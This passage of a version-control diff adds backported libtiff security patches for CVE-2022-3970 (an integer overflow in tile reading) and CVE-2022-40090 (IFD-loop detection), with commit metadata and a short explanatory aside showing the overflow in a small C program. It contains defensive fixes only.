+- for (i = 0; i < td->td_customValueCount; i++) {
+- uint16 val;
+- TIFFTagValue *tv = td->td_customValues + i;
+- if (tv->info->field_tag != standard_tag)
+- continue;
+- if( tv->value == NULL )
+- return 0;
+- val = *(uint16 *)tv->value;
+- /* Truncate to SamplesPerPixel, since the */
+- /* setting code for INKNAMES assume that there are SamplesPerPixel */
+- /* inknames. */
+- /* Fixes http://bugzilla.maptools.org/show_bug.cgi?id=2599 */
+- if( val > td->td_samplesperpixel )
+- {
+- TIFFWarningExt(tif->tif_clientdata,"_TIFFVGetField",
+- "Truncating NumberOfInks from %u to %u",
+- val, td->td_samplesperpixel);
+- val = td->td_samplesperpixel;
+- }
+- *va_arg(ap, uint16*) = val;
+- return 1;
+- }
+- return 0;
+- }
+
+ switch (standard_tag) {
+ case TIFFTAG_SUBFILETYPE:
+@@ -1092,6 +1111,9 @@ _TIFFVGetField(TIFF* tif, uint32 tag, va_list ap)
+ case TIFFTAG_INKNAMES:
+ *va_arg(ap, char**) = td->td_inknames;
+ break;
++ case TIFFTAG_NUMBEROFINKS:
++ *va_arg(ap, uint16 *) = td->td_numberofinks;
++ break;
+ default:
+ {
+ int i;
+diff --git a/libtiff/tif_dir.h b/libtiff/tif_dir.h
+index e7f0667..7cad679 100644
+--- a/libtiff/tif_dir.h
++++ b/libtiff/tif_dir.h
+@@ -117,6 +117,7 @@ typedef struct {
+ /* CMYK parameters */
+ int td_inknameslen;
+ char* td_inknames;
++ uint16 td_numberofinks; /* number of inks in InkNames string */
+
+ int td_customValueCount;
+ TIFFTagValue *td_customValues;
+@@ -174,6 +175,7 @@ typedef struct {
+ #define FIELD_TRANSFERFUNCTION 44
+ #define FIELD_INKNAMES 46
+ #define FIELD_SUBIFD 49
++#define FIELD_NUMBEROFINKS 50
+ /* FIELD_CUSTOM (see tiffio.h) 65 */
+ /* end of support for well-known tags; codec-private tags follow */
+ #define FIELD_CODEC 66 /* base of codec-private tags */
+diff --git a/libtiff/tif_dirinfo.c b/libtiff/tif_dirinfo.c
+index fbfaaf0..bf7de70 100644
+--- a/libtiff/tif_dirinfo.c
++++ b/libtiff/tif_dirinfo.c
+@@ -104,7 +104,7 @@ tiffFields[] = {
+ { TIFFTAG_SUBIFD, -1, -1, TIFF_IFD8, 0, TIFF_SETGET_C16_IFD8, TIFF_SETGET_UNDEFINED, FIELD_SUBIFD, 1, 1, "SubIFD", (TIFFFieldArray*) &tiffFieldArray },
+ { TIFFTAG_INKSET, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "InkSet", NULL },
+ { TIFFTAG_INKNAMES, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_C16_ASCII, TIFF_SETGET_UNDEFINED, FIELD_INKNAMES, 1, 1, "InkNames", NULL },
+- { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "NumberOfInks", NULL },
++ { TIFFTAG_NUMBEROFINKS, 1, 1, TIFF_SHORT, 0, TIFF_SETGET_UINT16, TIFF_SETGET_UNDEFINED, FIELD_NUMBEROFINKS, 1, 0, "NumberOfInks", NULL },
+ { TIFFTAG_DOTRANGE, 2, 2, TIFF_SHORT, 0, TIFF_SETGET_UINT16_PAIR, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 0, 0, "DotRange", NULL },
+ { TIFFTAG_TARGETPRINTER, -1, -1, TIFF_ASCII, 0, TIFF_SETGET_ASCII, TIFF_SETGET_UNDEFINED, FIELD_CUSTOM, 1, 0, "TargetPrinter", NULL },
+ { TIFFTAG_EXTRASAMPLES, -1, -1, TIFF_SHORT, 0, TIFF_SETGET_C16_UINT16, TIFF_SETGET_UNDEFINED, FIELD_EXTRASAMPLES, 0, 1, "ExtraSamples", NULL },
+diff --git a/libtiff/tif_dirwrite.c b/libtiff/tif_dirwrite.c
+index 9e4d306..a2dbc3b 100644
+--- a/libtiff/tif_dirwrite.c
++++ b/libtiff/tif_dirwrite.c
+@@ -677,6 +677,11 @@ TIFFWriteDirectorySec(TIFF* tif, int isimage, int imagedone, uint64* pdiroff)
+ if (!TIFFWriteDirectoryTagAscii(tif,&ndir,dir,TIFFTAG_INKNAMES,tif->tif_dir.td_inknameslen,tif->tif_dir.td_inknames))
+ goto bad;
+ }
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS))
++ {
++ if (!TIFFWriteDirectoryTagShort(tif, &ndir, dir, TIFFTAG_NUMBEROFINKS, tif->tif_dir.td_numberofinks))
++ goto bad;
++ }
+ if (TIFFFieldSet(tif,FIELD_SUBIFD))
+ {
+ if (!TIFFWriteDirectoryTagSubifd(tif,&ndir,dir))
+diff --git a/libtiff/tif_print.c b/libtiff/tif_print.c
+index a073794..a9f05a7 100644
+--- a/libtiff/tif_print.c
++++ b/libtiff/tif_print.c
+@@ -402,6 +402,10 @@ TIFFPrintDirectory(TIFF* tif, FILE* fd, long flags)
+ }
+ fputs("\n", fd);
+ }
++ if (TIFFFieldSet(tif, FIELD_NUMBEROFINKS)) {
++ fprintf(fd, " NumberOfInks: %d\n",
++ td->td_numberofinks);
++ }
+ if (TIFFFieldSet(tif,FIELD_THRESHHOLDING)) {
+ fprintf(fd, " Thresholding: ");
+ switch (td->td_threshholding) {
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
new file mode 100644
index 0000000000..ea70827cbe
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch
@@ -0,0 +1,45 @@
+From 7e87352217d1f0c77eee7033ac59e3aab08532bb Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 8 Nov 2022 15:16:58 +0100
+Subject: [PATCH] TIFFReadRGBATileExt(): fix (unsigned) integer overflow on
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
+CVE: CVE-2022-3970
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+Origin: https://gitlab.com/libtiff/libtiff/-/commit/227500897dfb07fb7d27f7aa570050e62617e3be
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-01-17
+
+ strips/tiles > 2 GB
+
+Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=53137
+
+---
+ libtiff/tif_getimage.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
+index 96ab146..0b90dcc 100644
+--- a/libtiff/tif_getimage.c
++++ b/libtiff/tif_getimage.c
+@@ -3042,15 +3042,15 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 col, uint32 row, uint32 * raster, int stop
+ return( ok );
+
+ for( i_row = 0; i_row < read_ysize; i_row++ ) {
+- memmove( raster + (tile_ysize - i_row - 1) * tile_xsize,
+- raster + (read_ysize - i_row - 1) * read_xsize,
++ memmove( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
++ raster + (size_t)(read_ysize - i_row - 1) * read_xsize,
+ read_xsize * sizeof(uint32) );
+- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize+read_xsize,
++ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize+read_xsize,
+ 0, sizeof(uint32) * (tile_xsize - read_xsize) );
+ }
+
+ for( i_row = read_ysize; i_row < tile_ysize; i_row++ ) {
+- _TIFFmemset( raster + (tile_ysize - i_row - 1) * tile_xsize,
++ _TIFFmemset( raster + (size_t)(tile_ysize - i_row - 1) * tile_xsize,
+ 0, sizeof(uint32) * tile_xsize );
+ }
+
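The overflow fixed above comes from doing the offset arithmetic in 32 bits: (tile_ysize - i_row - 1) * tile_xsize is evaluated as uint32 before it is added to the raster pointer, so for strips/tiles larger than 2 GB the product wraps. A minimal stand-alone sketch of the difference the size_t cast makes; the geometry values below are illustrative, not taken from the patch:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

int main(void)
{
    /* Illustrative tile geometry: rows * columns exceeds 2^32 elements. */
    uint32_t tile_xsize = 70000;
    uint32_t tile_ysize = 70000;
    uint32_t i_row = 0;

    /* Evaluated purely in uint32: the product wraps modulo 2^32. */
    uint32_t wrapped = (tile_ysize - i_row - 1) * tile_xsize;

    /* Cast first, as the fix does: with a 64-bit size_t the product
     * keeps its full value and the raster offset stays correct. */
    size_t safe = (size_t)(tile_ysize - i_row - 1) * tile_xsize;

    printf("wrapped offset: %u\n", (unsigned)wrapped);
    printf("correct offset: %zu\n", safe);
    return 0;
}

Built with a 64-bit size_t, the first printf shows the wrapped value while the second keeps the full product.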
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
new file mode 100644
index 0000000000..0a88f59553
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch
@@ -0,0 +1,548 @@
+From d385738335deb0c4bb70449f12e411f2203c0d01 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 2 Sep 2022 21:20:28 +0200
+Subject: [PATCH 1/4] Improved IFD-Loop Handling (fixes #455)
+
+Basic approach:
+- The order in the entire chain must be checked, and not only whether an offset has already been read once.
+- To do this, pairs of directory number and offset are stored and checked.
+- The offset of a directory number can change.
+- TIFFAdvanceDirectory() must also perform an IFD loop check.
+- TIFFCheckDirOffset() is replaced by _TIFFCheckDirNumberAndOffset().
+
+Rules for the check:
+- If an offset is already in the list, it must have the same IFD number. Otherwise it is an IFD loop.
+- If the offset is not in the list and the IFD number is greater than the number of list entries, a new list entry is added.
+- Otherwise, the offset of the IFD number is updated.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2022-40090.patch?h=ubuntu/focal-security
+Upstream commit
+https://gitlab.com/libtiff/libtiff/-/commit/c7caec9a4d8f24c17e667480d2c7d0d51c9fae41]
+CVE: CVE-2022-40090
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_close.c | 6 ++-
+ libtiff/tif_dir.c | 91 +++++++++++++++++++++++++----------------
+ libtiff/tif_dir.h | 1 +
+ libtiff/tif_dirread.c | 94 ++++++++++++++++++++++++++++++-------------
+ libtiff/tif_open.c | 3 +-
+ libtiff/tiffiop.h | 3 +-
+ 6 files changed, 131 insertions(+), 67 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_close.c
++++ tiff-4.1.0+git191117/libtiff/tif_close.c
+@@ -52,8 +52,10 @@ TIFFCleanup(TIFF* tif)
+ (*tif->tif_cleanup)(tif);
+ TIFFFreeDirectory(tif);
+
+- if (tif->tif_dirlist)
+- _TIFFfree(tif->tif_dirlist);
++ if (tif->tif_dirlistoff)
++ _TIFFfree(tif->tif_dirlistoff);
++ if (tif->tif_dirlistdirn)
++ _TIFFfree(tif->tif_dirlistdirn);
+
+ /*
+ * Clean up client info links.
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.c
++++ tiff-4.1.0+git191117/libtiff/tif_dir.c
+@@ -1463,12 +1463,22 @@ TIFFDefaultDirectory(TIFF* tif)
+ }
+
+ static int
+-TIFFAdvanceDirectory(TIFF* tif, uint64* nextdir, uint64* off)
++TIFFAdvanceDirectory(TIFF* tif, uint64* nextdiroff, uint64* off, uint16* nextdirnum)
+ {
+ static const char module[] = "TIFFAdvanceDirectory";
++
++ /* Add this directory to the directory list, if not already in. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++ TIFFErrorExt(tif->tif_clientdata, module, "Starting directory %hu at offset 0x%lx (%lu) might cause an IFD loop",
++ *nextdirnum, *nextdiroff, *nextdiroff);
++ *nextdiroff = 0;
++ *nextdirnum = 0;
++ return(0);
++ }
++
+ if (isMapped(tif))
+ {
+- uint64 poff=*nextdir;
++ uint64 poff=*nextdiroff;
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+ {
+ tmsize_t poffa,poffb,poffc,poffd;
+@@ -1479,7 +1489,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ if (((uint64)poffa!=poff)||(poffb<poffa)||(poffb<(tmsize_t)sizeof(uint16))||(poffb>tif->tif_size))
+ {
+ TIFFErrorExt(tif->tif_clientdata,module,"Error fetching directory count");
+- *nextdir=0;
++ *nextdiroff=0;
+ return(0);
+ }
+ _TIFFmemcpy(&dircount,tif->tif_base+poffa,sizeof(uint16));
+@@ -1497,7 +1507,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ _TIFFmemcpy(&nextdir32,tif->tif_base+poffc,sizeof(uint32));
+ if (tif->tif_flags&TIFF_SWAB)
+ TIFFSwabLong(&nextdir32);
+- *nextdir=nextdir32;
++ *nextdiroff=nextdir32;
+ }
+ else
+ {
+@@ -1529,11 +1539,10 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ }
+ if (off!=NULL)
+ *off=(uint64)poffc;
+- _TIFFmemcpy(nextdir,tif->tif_base+poffc,sizeof(uint64));
++ _TIFFmemcpy(nextdiroff,tif->tif_base+poffc,sizeof(uint64));
+ if (tif->tif_flags&TIFF_SWAB)
+- TIFFSwabLong8(nextdir);
++ TIFFSwabLong8(nextdiroff);
+ }
+- return(1);
+ }
+ else
+ {
+@@ -1541,7 +1550,7 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ {
+ uint16 dircount;
+ uint32 nextdir32;
+- if (!SeekOK(tif, *nextdir) ||
++ if (!SeekOK(tif, *nextdiroff) ||
+ !ReadOK(tif, &dircount, sizeof (uint16))) {
+ TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ tif->tif_name);
+@@ -1562,13 +1571,13 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ }
+ if (tif->tif_flags & TIFF_SWAB)
+ TIFFSwabLong(&nextdir32);
+- *nextdir=nextdir32;
++ *nextdiroff=nextdir32;
+ }
+ else
+ {
+ uint64 dircount64;
+ uint16 dircount16;
+- if (!SeekOK(tif, *nextdir) ||
++ if (!SeekOK(tif, *nextdiroff) ||
+ !ReadOK(tif, &dircount64, sizeof (uint64))) {
+ TIFFErrorExt(tif->tif_clientdata, module, "%s: Error fetching directory count",
+ tif->tif_name);
+@@ -1588,17 +1597,27 @@ TIFFAdvanceDirectory(TIFF* tif, uint64*
+ else
+ (void) TIFFSeekFile(tif,
+ dircount16*20, SEEK_CUR);
+- if (!ReadOK(tif, nextdir, sizeof (uint64))) {
++ if (!ReadOK(tif, nextdiroff, sizeof (uint64))) {
+ TIFFErrorExt(tif->tif_clientdata, module,
+ "%s: Error fetching directory link",
+ tif->tif_name);
+ return (0);
+ }
+ if (tif->tif_flags & TIFF_SWAB)
+- TIFFSwabLong8(nextdir);
++ TIFFSwabLong8(nextdiroff);
+ }
+- return (1);
+ }
++ if (*nextdiroff != 0) {
++ (*nextdirnum)++;
++ /* Check next directory for IFD looping and if so, set it as last directory. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, *nextdirnum, *nextdiroff)) {
++ TIFFWarningExt(tif->tif_clientdata, module, "the next directory %hu at offset 0x%lx (%lu) might be an IFD loop. Treating directory %hu as last directory",
++ *nextdirnum, *nextdiroff, *nextdiroff, *nextdirnum-1);
++ *nextdiroff = 0;
++ (*nextdirnum)--;
++ }
++ }
++ return (1);
+ }
+
+ /*
+@@ -1608,14 +1627,16 @@ uint16
+ TIFFNumberOfDirectories(TIFF* tif)
+ {
+ static const char module[] = "TIFFNumberOfDirectories";
+- uint64 nextdir;
++ uint64 nextdiroff;
++ uint16 nextdirnum;
+ uint16 n;
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+- nextdir = tif->tif_header.classic.tiff_diroff;
++ nextdiroff = tif->tif_header.classic.tiff_diroff;
+ else
+- nextdir = tif->tif_header.big.tiff_diroff;
++ nextdiroff = tif->tif_header.big.tiff_diroff;
++ nextdirnum = 0;
+ n = 0;
+- while (nextdir != 0 && TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ while (nextdiroff != 0 && TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ {
+ if (n != 65535) {
+ ++n;
+@@ -1638,28 +1659,30 @@ TIFFNumberOfDirectories(TIFF* tif)
+ int
+ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ {
+- uint64 nextdir;
++ uint64 nextdiroff;
++ uint16 nextdirnum;
+ uint16 n;
+
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+- nextdir = tif->tif_header.classic.tiff_diroff;
++ nextdiroff = tif->tif_header.classic.tiff_diroff;
+ else
+- nextdir = tif->tif_header.big.tiff_diroff;
+- for (n = dirn; n > 0 && nextdir != 0; n--)
+- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ nextdiroff = tif->tif_header.big.tiff_diroff;
++ nextdirnum = 0;
++ for (n = dirn; n > 0 && nextdiroff != 0; n--)
++ if (!TIFFAdvanceDirectory(tif, &nextdiroff, NULL, &nextdirnum))
+ return (0);
+- tif->tif_nextdiroff = nextdir;
++ /* If the n-th directory could not be reached (does not exist),
++ * return here without touching anything further. */
++ if (nextdiroff == 0 || n > 0)
++ return (0);
++
++ tif->tif_nextdiroff = nextdiroff;
+ /*
+ * Set curdir to the actual directory index. The
+ * -1 is because TIFFReadDirectory will increment
+ * tif_curdir after successfully reading the directory.
+ */
+ tif->tif_curdir = (dirn - n) - 1;
+- /*
+- * Reset tif_dirnumber counter and start new list of seen directories.
+- * We need this to prevent IFD loops.
+- */
+- tif->tif_dirnumber = 0;
+ return (TIFFReadDirectory(tif));
+ }
+
+@@ -1672,13 +1695,42 @@ TIFFSetDirectory(TIFF* tif, uint16 dirn)
+ int
+ TIFFSetSubDirectory(TIFF* tif, uint64 diroff)
+ {
+- tif->tif_nextdiroff = diroff;
+- /*
+- * Reset tif_dirnumber counter and start new list of seen directories.
+- * We need this to prevent IFD loops.
++ /* Match nextdiroff and curdir for consistent IFD-loop checking.
++ * Only with TIFFSetSubDirectory() the IFD list can be corrupted with invalid offsets
++ * within the main IFD tree.
++ * In the case of several subIFDs of a main image,
++ * there are two possibilities that are not even mutually exclusive.
++ * a.) The subIFD tag contains an array with all offsets of the subIFDs.
++ * b.) The SubIFDs are concatenated with their NextIFD parameters.
++ * (refer to https://www.awaresystems.be/imaging/tiff/specification/TIFFPM6.pdf.)
+ */
+- tif->tif_dirnumber = 0;
+- return (TIFFReadDirectory(tif));
++ int retval;
++ uint16 curdir = 0;
++ int8 probablySubIFD = 0;
++ if (diroff == 0) {
++ /* Special case to invalidate the tif_lastdiroff member. */
++ tif->tif_curdir = 65535;
++ } else {
++ if (!_TIFFGetDirNumberFromOffset(tif, diroff, &curdir)) {
++ /* Non-existing offsets might point to a SubIFD or invalid IFD.*/
++ probablySubIFD = 1;
++ }
++ /* -1 because TIFFReadDirectory() will increment tif_curdir. */
++ tif->tif_curdir = curdir - 1;
++ }
++
++ tif->tif_nextdiroff = diroff;
++ retval = TIFFReadDirectory(tif);
++ /* If failed, curdir was not incremented in TIFFReadDirectory(), so set it back. */
++ if (!retval )tif->tif_curdir++;
++ if (retval && probablySubIFD) {
++ /* Reset IFD list to start new one for SubIFD chain and also start SubIFD chain with tif_curdir=0. */
++ tif->tif_dirnumber = 0;
++ tif->tif_curdir = 0; /* first directory of new chain */
++ /* add this offset to new IFD list */
++ _TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir, diroff);
++ }
++ return (retval);
+ }
+
+ /*
+@@ -1702,12 +1754,15 @@ TIFFLastDirectory(TIFF* tif)
+
+ /*
+ * Unlink the specified directory from the directory chain.
++ * Note: First directory starts with number dirn=1.
++ * This is different to TIFFSetDirectory() where the first directory starts with zero.
+ */
+ int
+ TIFFUnlinkDirectory(TIFF* tif, uint16 dirn)
+ {
+ static const char module[] = "TIFFUnlinkDirectory";
+ uint64 nextdir;
++ uint16 nextdirnum;
+ uint64 off;
+ uint16 n;
+
+@@ -1731,19 +1786,21 @@ TIFFUnlinkDirectory(TIFF* tif, uint16 di
+ nextdir = tif->tif_header.big.tiff_diroff;
+ off = 8;
+ }
++ nextdirnum = 0; /* First directory is dirn=0 */
++
+ for (n = dirn-1; n > 0; n--) {
+ if (nextdir == 0) {
+ TIFFErrorExt(tif->tif_clientdata, module, "Directory %d does not exist", dirn);
+ return (0);
+ }
+- if (!TIFFAdvanceDirectory(tif, &nextdir, &off))
++ if (!TIFFAdvanceDirectory(tif, &nextdir, &off, &nextdirnum))
+ return (0);
+ }
+ /*
+ * Advance to the directory to be unlinked and fetch
+ * the offset of the directory that follows.
+ */
+- if (!TIFFAdvanceDirectory(tif, &nextdir, NULL))
++ if (!TIFFAdvanceDirectory(tif, &nextdir, NULL, &nextdirnum))
+ return (0);
+ /*
+ * Go back and patch the link field of the preceding
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dir.h
++++ tiff-4.1.0+git191117/libtiff/tif_dir.h
+@@ -300,6 +300,8 @@ extern int _TIFFMergeFields(TIFF*, const
+ extern const TIFFField* _TIFFFindOrRegisterField(TIFF *, uint32, TIFFDataType);
+ extern TIFFField* _TIFFCreateAnonField(TIFF *, uint32, TIFFDataType);
+ extern int _TIFFCheckFieldIsValidForCodec(TIFF *tif, ttag_t tag);
++extern int _TIFFCheckDirNumberAndOffset(TIFF *tif, uint16 dirn, uint64 diroff);
++extern int _TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16 *dirn);
+
+ #if defined(__cplusplus)
+ }
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -158,7 +158,6 @@ static void TIFFReadDirectoryFindFieldIn
+
+ static int EstimateStripByteCounts(TIFF* tif, TIFFDirEntry* dir, uint16 dircount);
+ static void MissingRequired(TIFF*, const char*);
+-static int TIFFCheckDirOffset(TIFF* tif, uint64 diroff);
+ static int CheckDirCount(TIFF*, TIFFDirEntry*, uint32);
+ static uint16 TIFFFetchDirectory(TIFF* tif, uint64 diroff, TIFFDirEntry** pdir, uint64* nextdiroff);
+ static int TIFFFetchNormalTag(TIFF*, TIFFDirEntry*, int recover);
+@@ -3584,12 +3583,19 @@ TIFFReadDirectory(TIFF* tif)
+ int bitspersample_read = FALSE;
+ int color_channels;
+
+- tif->tif_diroff=tif->tif_nextdiroff;
+- if (!TIFFCheckDirOffset(tif,tif->tif_nextdiroff))
+- return 0; /* last offset or bad offset (IFD looping) */
+- (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
+- tif->tif_curdir++;
+- nextdiroff = tif->tif_nextdiroff;
++ if (tif->tif_nextdiroff == 0) {
++ /* In this special case, tif_diroff needs also to be set to 0. */
++ tif->tif_diroff = tif->tif_nextdiroff;
++ return 0; /* last offset, thus no checking necessary */
++ }
++
++ nextdiroff = tif->tif_nextdiroff;
++ /* tif_curdir++ and tif_nextdiroff should only be updated after SUCCESSFUL reading of the directory. Otherwise, invalid IFD offsets could corrupt the IFD list. */
++ if (!_TIFFCheckDirNumberAndOffset(tif, tif->tif_curdir + 1, nextdiroff)) {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Didn't read next directory due to IFD looping at offset 0x%lx (%lu) to offset 0x%lx (%lu)", tif->tif_diroff, tif->tif_diroff, nextdiroff, nextdiroff);
++ return 0; /* bad offset (IFD looping) */
++ }
+ dircount=TIFFFetchDirectory(tif,nextdiroff,&dir,&tif->tif_nextdiroff);
+ if (!dircount)
+ {
+@@ -3597,6 +3603,11 @@ TIFFReadDirectory(TIFF* tif)
+ "Failed to read directory at offset " TIFF_UINT64_FORMAT,nextdiroff);
+ return 0;
+ }
++ /* Set global values after a valid directory has been fetched.
++ * tif_diroff is already set to nextdiroff in TIFFFetchDirectory() in the beginning. */
++ tif->tif_curdir++;
++ (*tif->tif_cleanup)(tif); /* cleanup any previous compression state */
++
+ TIFFReadDirectoryCheckOrder(tif,dir,dircount);
+
+ /*
+@@ -4628,13 +4639,17 @@ MissingRequired(TIFF* tif, const char* t
+ }
+
+ /*
+- * Check the directory offset against the list of already seen directory
+- * offsets. This is a trick to prevent IFD looping. The one can create TIFF
+- * file with looped directory pointers. We will maintain a list of already
+- * seen directories and check every IFD offset against that list.
++ * Check the directory number and offset against the list of already seen
++ * directory numbers and offsets. This is a trick to prevent IFD looping.
++ * The one can create TIFF file with looped directory pointers. We will
++ * maintain a list of already seen directories and check every IFD offset
++ * and its IFD number against that list. However, the offset of an IFD number
++ * can change - e.g. when writing updates to file.
++ * Returns 1 if all is ok; 0 if last directory or IFD loop is encountered,
++ * or an error has occured.
+ */
+-static int
+-TIFFCheckDirOffset(TIFF* tif, uint64 diroff)
++int
++_TIFFCheckDirNumberAndOffset(TIFF* tif, uint16 dirn, uint64 diroff)
+ {
+ uint16 n;
+
+@@ -4646,35 +4661,64 @@ TIFFCheckDirOffset(TIFF* tif, uint64 dir
+ return 0;
+ }
+
+- for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlist; n++) {
+- if (tif->tif_dirlist[n] == diroff)
+- return 0;
++ /* Check if offset is already in the list:
++ * - yes: check, if offset is at the same IFD number - if not, it is an IFD loop
++ * - no: add to list or update offset at that IFD number
++ */
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ if (tif->tif_dirlistdirn[n] == dirn) {
++ return 1;
++ } else {
++ TIFFWarningExt(tif->tif_clientdata, "_TIFFCheckDirNumberAndOffset",
++ "TIFF directory %hu has IFD looping to directory %hu at offset 0x%lx (%lu)",
++ dirn-1, tif->tif_dirlistdirn[n], diroff, diroff);
++ return 0;
++ }
++ }
++ }
++ /* Check if offset of an IFD has been changed and update offset of that IFD number. */
++ if (dirn < tif->tif_dirnumber && tif->tif_dirlistdirn && tif->tif_dirlistoff) {
++ /* tif_dirlistdirn can have IFD numbers dirn in random order */
++ for (n = 0; n < tif->tif_dirnumber; n++) {
++ if (tif->tif_dirlistdirn[n] == dirn) {
++ tif->tif_dirlistoff[n] = diroff;
++ return 1;
++ }
++ }
+ }
+
++ /* Add IFD offset and dirn to IFD directory list */
+ tif->tif_dirnumber++;
+
+- if (tif->tif_dirlist == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
+- uint64* new_dirlist;
+-
++ if (tif->tif_dirlistoff == NULL || tif->tif_dirlistdirn == NULL || tif->tif_dirnumber > tif->tif_dirlistsize) {
++ uint64 *new_dirlist;
+ /*
+ * XXX: Reduce memory allocation granularity of the dirlist
+ * array.
+ */
+- new_dirlist = (uint64*)_TIFFCheckRealloc(tif, tif->tif_dirlist,
+- tif->tif_dirnumber, 2 * sizeof(uint64), "for IFD list");
++ if (tif->tif_dirnumber >= 32768)
++ tif->tif_dirlistsize = 65535;
++ else
++ tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
++
++ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistoff,
++ tif->tif_dirlistsize, sizeof(uint64), "for IFD offset list");
+ if (!new_dirlist)
+ return 0;
+- if( tif->tif_dirnumber >= 32768 )
+- tif->tif_dirlistsize = 65535;
+- else
+- tif->tif_dirlistsize = 2 * tif->tif_dirnumber;
+- tif->tif_dirlist = new_dirlist;
++ tif->tif_dirlistoff = new_dirlist;
++ new_dirlist = (uint64 *)_TIFFCheckRealloc(tif, tif->tif_dirlistdirn,
++ tif->tif_dirlistsize, sizeof(uint16), "for IFD dirnumber list");
++ if (!new_dirlist)
++ return 0;
++ tif->tif_dirlistdirn = (uint16 *)new_dirlist;
+ }
+
+- tif->tif_dirlist[tif->tif_dirnumber - 1] = diroff;
++ tif->tif_dirlistoff[tif->tif_dirnumber - 1] = diroff;
++ tif->tif_dirlistdirn[tif->tif_dirnumber - 1] = dirn;
+
+ return 1;
+-}
++} /* --- _TIFFCheckDirNumberAndOffset() ---*/
+
+ /*
+ * Check the count field of a directory entry against a known value. The
+@@ -4703,6 +4747,47 @@ CheckDirCount(TIFF* tif, TIFFDirEntry* d
+ }
+
+ /*
++ * Retrieve the matching IFD directory number of a given IFD offset
++ * from the list of directories already seen.
++ * Returns 1 if the offset was in the list and the directory number
++ * can be returned.
++ * Otherwise returns 0 or if an error occured.
++ */
++int
++_TIFFGetDirNumberFromOffset(TIFF *tif, uint64 diroff, uint16* dirn)
++{
++ uint16 n;
++
++ if (diroff == 0) /* no more directories */
++ return 0;
++ if (tif->tif_dirnumber == 65535) {
++ TIFFErrorExt(tif->tif_clientdata, "_TIFFGetDirNumberFromOffset",
++ "Cannot handle more than 65535 TIFF directories");
++ return 0;
++ }
++
++ /* Check if offset is already in the list and return matching directory number.
++ * Otherwise update IFD list using TIFFNumberOfDirectories()
++ * and search again in IFD list.
++ */
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ *dirn = tif->tif_dirlistdirn[n];
++ return 1;
++ }
++ }
++ TIFFNumberOfDirectories(tif);
++ for (n = 0; n < tif->tif_dirnumber && tif->tif_dirlistoff && tif->tif_dirlistdirn; n++) {
++ if (tif->tif_dirlistoff[n] == diroff) {
++ *dirn = tif->tif_dirlistdirn[n];
++ return 1;
++ }
++ }
++ return 0;
++} /*--- _TIFFGetDirNumberFromOffset() ---*/
